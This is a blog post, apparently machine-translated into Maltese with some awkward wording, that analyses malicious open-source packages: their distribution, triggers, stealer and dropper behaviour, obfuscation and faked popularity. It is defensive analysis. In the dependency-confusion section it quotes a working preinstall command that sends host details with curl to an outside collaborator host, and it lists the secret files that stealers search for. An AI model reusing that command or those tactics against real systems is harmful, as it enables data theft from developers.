Fl-episodju ta’ qabel, Pakketti Malizzjużi ta' Sors Miftuħ: Il-Problema, iddiskutejna għaliex l-atturi tat-theddid kienu daqshekk entużjasti dwar il-pubblikazzjoni ta' komponenti malizzjużi ġodda jew l-injezzjoni ta' malware fl-aħħar verżjonijiet ta' komponenti eżistenti: L-infrastruttura open source tippermetti lil kulħadd kullimkien joħloq kont effimeru f'reġistru ta' komponenti (bħal NPM, PyPI, Docker Hub jew Visual Studio Marketplace) jew pjattaforma ta' żvilupp kollaborattiv (bħal GitHub). Spiża żero, u ħafna opportunitajiet biex tiġi sfruttata l-fiduċja żejda li t-timijiet tas-softwer tradizzjonalment għandhom fuq komponenti ta' partijiet terzi.
L-assimetrija bejn kemm hu faċli għall-attakkanti li jqassmu malware bl-użu tal-infrastruttura disponibbli għal open source, u kemm hu diffiċli għall-organizzazzjonijiet li jiżviluppaw softwer (kulħadd?) biex jevitaw li jiġu infettati bil-malware (u li jwasslu malware fis-softwer li jqassmu għal oħrajn), wasslet biex kważi ntlaħqet il-marka ta' kwart ta' miljun ta' pakketti malizzjużi s-sena l-oħra.
Din hija problema ta’ kobor tali li l-ebda organizzazzjoni waħedha ma tista’ ssolviha, u l-komunità tinsab fil-proċess li tfassal mill-ġdid il-proċess tas-sors miftuħ dwar il-fiduċja, il-prinċipji ta’ sigurtà b’mod awtomatiku u sigurtà bid-disinn, u ċ-ċiklu tal-ħajja tal-komponenti. Se nagħtu ħarsa lejn ideat bħal dawn fl-episodju li jmiss. Protezzjoni Kontra Pakketti Malizzjużi ta' Sors Miftuħ: X'Jaħdem (Ma Jaħdimx).
Ftakar li qed nitkellmu dwar komponenti tas-softwer li ħafna drabi jikkorrispondu għal pakketti ta 'softwer: komponenti li jistgħu jerġgħu jintużaw ippakkjati sabiex ikunu jistgħu jiġu referenzjati bħala dipendenza f'manifest tas-softwer, u installati b'maniġer tal-pakketti jew għodda tal-bini. Jekk jogħġbok innota li dan il-każ jista' jiġi estiż biex jinkludi pubbliċi immaġnijiet tal-kontenituri (użat minn runtimes tal-kontejners u pjattaformi ta' orkestrazzjoni bħal Kubernetes), u estensjonijiet għal għodod tas-softwer (għall-bini, l-awtomazzjoni, u l-iskjerament).
Hawnhekk nanalizzaw kif dan tattika ta' attakk ibbażata fuq komponenti malizzjużi jaħdem, skont eżempji tal-passat u dak li rajna fil-pjattaforma tagħna għal Twissija Bikrija ta' Malware (MEW). Se nanalizzaw komponenti malizzjużi f'dimensjonijiet differenti:
(1) il-mod magħżul għad-distribuzzjoni (ir-reġistru użat, f'komponent ġdid jew eżistenti, u t-teknika użata biex tiġi infettata l-verżjoni tal-komponent ippubblikata), (2) kif il-malware jiġi attivat jew attivat, (3) l-imġiba malizzjuża jiġifieri liema azzjonijiet ta' ħsara jiġu osservati u x'inhi l-motivazzjoni tal-attakkant, (4) liema tekniki huma komuni għall-offuskazzjoni, il-ħabi biex ma jindunax bihom, il-moviment laterali, il-komunikazzjoni mal-ospiti tal-kmand u l-kontroll (C2), eċċ.; u (5) it-tekniki biex tinkiseb biżżejjed popolarità u fiduċja sabiex il-vittmi jispiċċaw jinstallaw il-komponent.
Il-Mekkaniżmu ta' Distribuzzjoni Magħżul
Aħna nosservaw “storbju fl-isfond"ta' pakketti malizzjużi mhux sofistikati li jużaw typosquatting biex jipphisjaw żviluppaturi mhux attenti b'żball tipografiku fl-isem tal-pakkett għad-dipendenza tagħhom. Ħafna pakketti popolari jirċievu għadd kbir ta' pakketti b'ismijiet simili b'żbalji tipografiċi, bl-istennija li dawn se jipphisjaw xi żviluppaturi mhux attenti."
Jużaw kont effimeru, jippubblikaw grupp ta’ pakketti typosquat, joħolqu ieħor, u jippubblikaw grupp ieħor… Bl-użu ta’ xi awtomazzjoni u inġenwità jistgħu jiksbu xi sofistikazzjoni, iżda tipikament huma pjuttost trivijali. Internament insejħulhom “inċova"Is-serq tal-kredenzjali huwa l-għan ewlieni, iżda kultant insibu spyware jisfrutta kodiċi tas-sors jew dejta sensittiva bħal informazzjoni personali identifikabbli (PII), qbid ta' clipboard, u dubji oħra."
Jiġu minn għarrieda naraw komponenti malizzjużi aktar sofistikati, il-"klieb il-baħar". Minoranza minnhom huma mmirati lejn gruppi jew organizzazzjonijiet speċifiċi, tipikament b'crypto drainers jew web skimmers li jiġu attivati b'mod kondizzjonali, forsi wara l-approċċ li deher fil- inċident tal-fluss tal-avvenimenti li jiddeċifra l-payload tal-attakk biss meta l-pakkett ikun referenzjat minn pakkett fil-mira.
Il-mekkaniżmu tad-distribuzzjoni ġie analizzat fid-dokument eċċellenti u issa klassiku, “Kollezzjoni tas-Sikkina ta' Backstabber: Reviżjoni tal-Attakki tal-Katina tal-Provvista tas-Softwer Open Source", li hija ħaġa li wieħed irid jaqraha. Żgur li diġà rajt din it-tabella sabiħa qabel:

Ġew esplorati l-mezzi kollha, inklużi pakketti ġodda u eżistenti; li jaffettwaw il-kodiċi tas-sors, is-sistema tal-bini, jew il-komponent ippakkjat innifsu; jużaw kredenzjali misruqa jew inġinerija soċjali; jaħtfu kontijiet u repożitorji abbandunati jew avvelenaw dawk miżmuma. Xi attakki rċevew ismijiet (Typosquatting, Konfużjoni dwar id-Dipendenza, Konfużjoni Manifesta, Repo-jacking. eċċ.) u diġà ġew diskussi x'imkien ieħor.
Xi ngħidu dwar ir-reġistri magħżula?
L-NPM għadu l-ewwel fin-numru totali ta' pakketti malizzjużi, iżda rajna żieda qawwija li bdiet din is-sena fuq PyPI. Python huwa ekosistema popolari għax-xjenza tad-dejta u t-tagħlim awtomatiku. Fil-fatt, id-densità tal-malware issa hija ogħla fil-PyPI milli fl-NPM.
Kif jiġi attivat il-malware
Pakketti malizzjużi jiġu attivati waqt l-installazzjoni f'4 minn kull 10 każijiet biss (f'dawn l-aħħar snin kien qrib is-6 minn kull 10). Il-bqija jħaddmu mġiba malizzjuża waqt l-eżekuzzjoni, b'1 minn kull 100 attivata waqt it-testijiet. L-avversarji jidhru li jafu li l-eżekuzzjoni bla kontroll tal-iskripts tal-installazzjoni kienet diżattivata f'ħafna postijiet.
X'qed jiksbu l-irġiel il-ħżiena?
Se niżżlu fil-lista l-kategoriji ta' mġiba malizzjuża, bl-aktar popolari l-ewwel. Jekk jogħġbok innota li l-impatt jista' jkun pjuttost differenti: a wiper huwa distruttiv b'mod persistenti, iżda mhux komuni u deher biss f'xi każijiet, relatati ma' kampanji ta' gwerra ċibernetika mmirati jew hacktiviżmu brutali. Il-kategoriji li ġejjin huma pjuttost komuni:
- InfoStealer / Credentials DrainerBil-bosta l-aktar frekwenti, aktar minn 90% tal-attakki mhux sofistikati huma stealers sempliċi li prinċipalment ifittxu kredenzjali bħal passwords, access tokens, API keys, u private keys (għal SSH u affarijiet simili). Probabbilment huwa l-aktar sempliċi biex jinkiteb (flimkien mal-wipers?). Huma jelenkaw fajls/direttorji magħrufa u sorsi oħra (eż. reġistru keys), jippakkjaw il-kontenut, u jibagħtu dik id-dejta lil server C2. L-idea hija sempliċi: "Jiena nippubblika stealer għal kredenzjali ta' phishing, sabiex aktar tard inkun nista' nuża l-kredenzjali biex inniedi attakk dirett".
In-netwerking C2 osservat huwa tipikament irħis u maħmuġ, bħal kanali tat-Telegram jew għodod tat-tħaffir bħal ngrok (spiss fil-forma ta' reverse proxies esposti permezz ta' IPs tal-ħruġ tal-VPN). Hemm mijiet (!) ta' possibbiltajiet, b'ħafna proġetti ta' GitHub taħt il- suġġett li jisraq il-passwordsSpeċjalizzazzjonijiet bħal keyloggers huma rari għal pakketti malizzjużi u immaġni ta' kontejners, iżda aktar frekwenti f'estensjonijiet ta' għodda, fejn hija mistennija l-interazzjoni tal-utent.
- Qattara / TniżżilIt-tieni fil-popolarità, tipikament jiġi l-ewwel f'attakki b'ħafna stadji. Aktar minn wieħed minn kull tlieta mill-komponenti malizzjużi għandhom droppers (jekk il-payload malizzjuż jiġi inkluż fil-pakkett) jew downloaders (il-payload jitniżżel minn endpoint taħt il-kontroll tal-attakkant). Il-payload spiss ikun varjant ta' malware binarju magħruf, u jitħaddem u xi kultant jippersisti, għall-installazzjoni ta' backdoors, spyware, crypto drainers, u każijiet ta' użu oħra. Il-payload imniżżel jew skjerat jibda attakk tat-tieni fażi bil-qawwa kollha pprovduta minn binarji ta' malware eżistenti. Il-binarji jistgħu jiġu mqassma fil-pakkett, spiss moħbija bħala immaġini jew tipi ta' fajls suppost innoċwi, biex jiġi evitat li jiġu skoperti waqt li wieħed jikkonnettja ma' siti mhux mistennija.
- Ħallelin / Minaturi tal-KriptomunitaL-avversarji motivati finanzjarjament huma lesti li jużaw l-assi tal-cloud tiegħek biex iħaddmu cryptominers (saħansitra jindunaw jekk humiex qed jaħdmu f'VM tal-cloud). Ma jimpurtahomx mill- proporzjon ta' profitt baxx ta’ $1 għal kull $53 li jiġu ċċarġjati lill-vittma għall-infrastruttura tas-sħab misruqa. Il-vittmi jistgħu ma jkunux konxji ta’ dan sakemm jirċievu kont mhux mistenni. Fortunatament, dan jiġi u jmur. Criptojacking kampanji f'pakketti malizzjużi kultant jitfaċċaw u mbagħad jisparixxu, jagħmlu phishing għall-utenti tal-kartiera jew eventwalment jimmiraw lejn il-fornitur tal-kartiera, bħal fil-każ ta' Attakk tal-Ledger.
Imġieba oħra, bħall-użu ta' backdoor għall-eżekuzzjoni ta' kodiċi mill-bogħod billi tinfetaħ reverse shell hija inqas frekwenti issa milli fil-passat. Pereżempju, l- 123rf_kontributur_web pakkett (issa mneħħi mir-reġistru) jiftaħ mingħajr ebda offuskazzjoni reverse shell ikkupjat u mwaħħal minn Folja ta' Qerq bil-Qoxra Reversa:

Minbarra l-komponenti leġittimi u malizzjużi, osservajna diversi abbużi, inklużi:
Pakketti tal-ispam
Hemm eluf ta’ pakketti żgħar, l-aktar f’NPM, mingħajr malware iżda li jwiegħdu qligħ faċli, żejt tas-sriep, links għal offerti tal-Viagra, u dak kollu. Ftit utenti jippubblikaw spam bħal dan u jieħdu ħafna bandwidth mir-reġistru. Attur(i) ieħor(i) possibbilment mill-Indoneżja pprovaw jiġbdu benefiċċju billi abbuż tat-teRank maħsub biex jikkumpensa lill-iżviluppaturi open-source, billi joħloq għexieren ta' eluf ta' pakketti NPM interrelatati ma' repożitorji finti relatati ta' GitHub. Dan huwa ksur ċar tat-termini tal-użu.
Bug bounty u frodi fir-riċerka dwar is-sigurtà
Meta pakkett jiddeskrivi lilu nnifsu bħala li qed jesfiltra d-dejta għal skopijiet tajbin, bħall-iskoperta ta' difetti fis-sigurtà għal programmi ta' bug bounty jew ir-riċerka ta' ċerti aspetti tal-ekosistema. Rajna eluf ta' pakketti f'din il-kategorija, li jġibu l-identifikazzjoni iżda mhux dejta sensittiva wisq għal indirizz ta' Burp Collaborator minn PortSwigger (eż. host fid-dominju oastify.com). Spiss osservajna kopji tal- Konfużjoni dwar id-Dipendenza prova tal-kunċett minn Alex Birsan, bħall- aurora-webmail-pro pakkett (imneħħi mir-reġistru), li sempliċement imexxi dan il-kodiċi ikrah fl-iskritt ta' qabel l-installazzjoni:
exec("a=$(hostname; pwd; whoami; echo 'aurora-webmail-pro'; curl http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/;) && echo $a | xxd -p | head | while read ut; do curl -k -i -s http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/$ut;done") U inkludiet ukoll “Din hija Prova tal-Kunċett ta' Attakk ta' Konfużjoni ta' Dipendenza Sempliċi"deskrizzjoni tad-dikjarazzjoni ta' ċaħda ta' responsabbiltà" fil- package.jsonDan huwa ksur ċar tat-termini tas-servizz, anke mingħajr intenzjoni malizzjuża.
Xi aħbar tajba? Għadna ma rajniex attakki ta' ransomware permezz ta' komponenti malizzjużi. Għal raġunijiet mhux magħrufa, iċ-ċiberkriminali jidhru li jippreferu phishing bl-email aktar tradizzjonali, ibbażat fuq RDP, u mekkaniżmi ta' kunsinna ta' downloads drive-by.
Tekniki Addizzjonali Osservati

Intużaw ħafna tekniki għall-persistenza, l-evażjoni tad-difiża, il-ġbir ta' informazzjoni, il-komunikazzjoni ma' hosts ta' kmand u kontroll, u l-esfiltrazzjoni.
Persistenza f'komponenti malizzjużi jinkiseb bl-użu tal-karatteristiċi ta' persistenza f'malware binarju tat-tieni stadju, iżda xi kultant l-imġiba tinsab fil-kodiċi tal-pakkett, bil-kompiti skedati u l-bidliet fir-reġistru tal-Windows ikunu l-aktar komuni.
Għafis huwa komuni, iżda mhux sofistikat. Il-biċċa l-kbira tal-pakketti tat-typosquatting (ftakar il-"inċova"?) ma jużawx offuskazzjoni xejn; ħafna jużaw jew dawk trivijali (kodifikazzjoni base64/hex jew ċifri ta' sostituzzjoni bħal rot13) jew jużaw offuskaturi tal-kodiċi disponibbli u minifikazzjoni, li hija faċilment imreġġa' lura bl-għodda t-tajba. Il-"klieb il-baħar" biss jagħmlu offuskazzjoni reali u iebsa, li hija diffiċli biex tiġi inġinerija b'lura.
L-offuskazzjoni tista' taħbi l-attakk, imma għaliex il-kodiċi f'komponent open-source għandu bżonn jiġi offuskat? Hemm evidenza li xi ħaġa teħtieġ li tinħeba mill-vista sempliċi? Sibna ħafna każijiet ta' pakketti mhux malizzjużi li jużaw l-offuskazzjoni biex jipproteġu l-proprjetà intellettwali, li huwa kontradittorju għal "open-source". L-offuskazzjoni tista' tintuża bħala evidenza ta' malware, imma mhijiex konklużiva. Huwa wkoll diffiċli li tneħħi l-offuskazzjoni.
evażjoni minn kontrolli ta' difiża jadotta tekniki sempliċi. Kodiċi malizzjuż ħafna drabi jkun protett fi ipprova … aqbad blokki li jinjoraw kwalunkwe eċċezzjoni, għalhekk attività anormali ma tintweriex fil-logs. Il-verifika tal-ambjent (li taħdem f'VM jew kontenitur) hija rari, sakemm ma jkunx għal malware li jimmira lejn organizzazzjoni jew ambjent partikolari.
Il-masqueraging ta' binarji f'immaġnijiet u fajls PDF (tip ta' steganografija) kienet teknika oħra li dehret biex tevita li wieħed jinduna.
Billi l-komponenti malizzjużi l-aktar komuni huma infostealers, ġbir ta 'data huwa essenzjali. Is-sigrieti (passwords, tokens ta' aċċess, ċwievet tal-API, ċwievet kriptografiċi) jiġu skennjati b'mod rutinarju fil-fajls tal-log, varjabbli tal-ambjent, u anke l-clipboard (jidher ma' trojans bankarji u kriptostealers). L-esfiltrazzjoni tal-kodiċi tas-sors hija wkoll komuni, peress li l-installazzjoni tal-pakkett ħafna drabi ssir f'nodu ta' żvilupp fejn ir-repożitorji git interni jistgħu jiġu kklonati. Rajna pakketti jenumeraw direttorji fit-tfittxija ta' repożitorji git. It-tfittxija għal postijiet bħal .env, private.pem, settings.py, app.js, jew application.properties hija pjuttost komuni.
L-esfiltrazzjoni hija azzjoni oħra użata b'mod wiesa'. Minoranza biss ta' pakketti malizzjużi jippruvaw jaħbu d-destinazzjoni tad-dejta estratta. Il-kanali tat-Telegram u mini bħal ngrok spiss jintużaw. U hemm ħafna dominji tipikament fuq il-lista bajda użati għall-esfiltrazzjoni.
Tekniki oħra, bħall-eskalazzjoni tal-privileġġi jew il-moviment laterali, kienu inqas komuni.
Niksbu Popolarità u Fiduċja
Immaġina kriminal teknoloġiku b'ħaġa malizzjuża qattiela lesta għall-użu jistaqsi: "Kif nista' nagħmel din il-biċċa ħmieġ affidabbli għal dawk l-imbeċilli li ma jissuspettaw xejn?".
Dan jissarraf f'kif tagħmel id-dħul għall-komponent malizzjuż biex juri ħafna stilel / forks (għall-popolarità), flimkien ma' verżjonijiet / kwistjonijiet u pull requests (għall-attività). L-idea hi li tinkiseb popolarità fittizja (stilel) u dipendenti, u dehra konvinċenti rigward ir-rilevanza u l-manutenzjoni.
Ir-reġistru ma jivverifikax jekk il-kontenut fi proġett GitHub u l-kontenut tal-pakkett jaqbluxDin hija kwistjoni magħrufa sew fil-katina tal-provvista tas-softwer. Ir-reġistri pubbliċi huma sinkholes ġganteski li jibilgħu kull ma jintefa’ lejhom. Tista’ tgħaqqad kwalunkwe repożitorju.

Jekk il-pakkett malizzjuż jagħmel żball tipografiku fuq wieħed popolari, dan faċli: sempliċement irreferi għar-repożitorju GitHub eżistenti fil-manifest tad-dipendenzi użat għall-ħolqien tal-pakkett u l-pubblikazzjoni tiegħu fir-reġistru. Għal pakketti ġodda fuq repożitorju GitHub falz, jista' jkollok bżonn aktar inġenwità, forsi toħloq repożitorju falz ta' GitHub. osservazzjoni tal-istilel/furketta Kontijiet ta' GitHub permezz ta' scripting.
U jekk il-kontenut tal-pakkett tiegħek huwa raġonevolment simili għar-repożitorju, daħħal ftit bidliet iddisinjati tajjeb hawn u hemm... Tista' tinjetta l-malware tiegħek f'pakkett ġdid li jixbah wieħed popolari li jirreferi għar-repożitorju ta' dak eżistenti, u tistenna l-iżbalji tat-tajping. Jekk xi ħadd jażżarda jqabbel il-kontenut tat-tarball tal-pakkett mal-kontenut mir-repożitorju ta' GitHub, id-differenzi fil-punti tal-injezzjoni tal-malware jistgħu faċilment jiġu injorati. Rajna dan l-approċċ ħafna drabi qabel.
Mekkaniżmu biex komponent jagħmel dikjarazzjoni li ma tistax tiġi mbagħbsa dwar il-provenjenza, kif inbena l-pakkett, minn liema sorsi, u minn min, ikun milqugħ. Iżda dik hija storja oħra.
Il-komponent X huwa malware?
Hemm database (komprensiva) ta' pakketti malizzjużi? Le. Il-vulnerabbiltajiet open-source għandhom CVE ID assenjat, iżda ftit pakketti malizzjużi biss (partikolarment dawk li jagħmlu l-aħbarijiet) jingħataw wieħed. Is-CWE għal pakketti malizzjużi hija CWE-506 (kodiċi malizzjuż inkorporat).
L-għodod tas-soltu kontra l-malware (VirusTotal, MalwareBazaar, SOREL-20M…) ma jagħmlux provvedimenti speċifiċi għal komponenti malizzjużi. Dan ikun milqugħ!
Hemm databases ta' kampjuni ta' riċerka u settijiet ta' dejta għall-analiżi (aħna nużaw ftit minnhom), iżda d-dħul jiġi aġġornat biss meta l-pakkett malizzjuż ikun magħruf, li ħafna drabi jkun tard wisq. Jekk inti interessat, il- OpenSSF Pakketti Malizzjużi huwa bidu sabiħ.
Fil-post li jmiss, se niddiskutu kif inkunu nafu jekk pakkett partikolari huwiex malizzjuż. Spoiler: iva, hemm modi kif tiċċekkja għal komponenti malizzjużi kmieni matul it-tieqa ta' espożizzjoni, qabel ma r-reġistru jneħħi komponent malizzjuż magħruf.
aktar qari
Fl-episodju li jmiss “Protezzjoni Kontra Pakketti Malizzjużi ta' Sors Miftuħ: X'Jaħdem (Ma Jaħdimx)" Se niddiskutu x'għandek tagħmel u x'm'għandekx tagħmel għas-sigurtà open-source. Il-biċċa l-kbira tal-professjonisti konxji mis-sigurtà għandhom intuwizzjonijiet dwar kif jimmaniġġjaw din it-theddida, iżda hemm ħafna kunċetti żbaljati.
Se nirrevedu għaliex dawn l-ideat huma żbaljati, u kif dawn il-kunċetti żbaljati qed jikkontribwixxu għall-popolarità ta’ dan il-mekkaniżmu ta’ attakk, u għar-riskju kbir li qed jesperjenzaw l-organizzazzjonijiet. Imbagħad se nipproċedu b’dak li jaħdem, u liema huma l-isforz u r-riżorsi involuti.
Ukoll, se nippubblikaw dwar l-evoluzzjoni ta' pakketti malizzjużi f'termini tal-intenzjoni tagħhom, il-mekkaniżmu ta' injezzjoni, u t-tekniki ta' attakk.
Soġġorn sintonizzat!






